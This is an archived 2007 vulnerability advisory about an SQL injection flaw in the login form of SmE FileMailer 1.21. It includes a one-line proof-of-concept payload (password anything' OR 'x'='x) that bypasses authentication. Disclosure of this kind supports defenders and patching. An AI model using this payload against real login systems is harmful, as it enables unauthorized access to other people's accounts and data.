TUCoPS :: HP Unsorted S :: c07-1918.htm

SmE FileMailer 1.21 Remote Sql Injextion Exploit
SmE FileMailer 1.21 Remote Sql Injextion Exploit
SmE FileMailer 1.21 Remote Sql Injextion Exploit


-=[--------------------ADVISORY-------------------]=-
                                              
                  SmE FileMailer 1.21
                                               
Author: CorryL [corryl80@gmail.com] 
-=[-----------------------------------------------]=-


-=[+] Application:    SmE FileMailer 
-=[+] Version:        1.21
-=[+] Vendor's URL: http://www.scriptme.com/down/13 
-=[+] Platform:       Windows\Linux\Unix
-=[+] Bug type:       sql injection
-=[+] Exploitation:   Remote
-=[-]
-=[+] Author:           CorryL  ~ corryl80[at]gmail[dot]com ~
-=[+] Reference: www.x0n3-h4ck.org 
-=[+] Virtual Office: http://www.kasamba.com/CorryL 
-=[+] Irc Chan:         irc.darksin.net #x0n3-h4ck        


..::[ Descriprion ]::..

SMe FileMailer lets you require visitors to submit their name and email address in order to retrieve a file from your site. Upon submitting the information, the link for file is sent to the visitor via email. This is a great way to stop leeching and third-party linking of your files, and it also lets you know exactly who's obtaining your files! 



..::[ Proof Of Concept ]::..

In the login form insert

Login: admin

Password: anything' OR 'x'='x 


..::[ Disclousure Timeline ]::..

 [16/01/2007] - Public disclousure

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH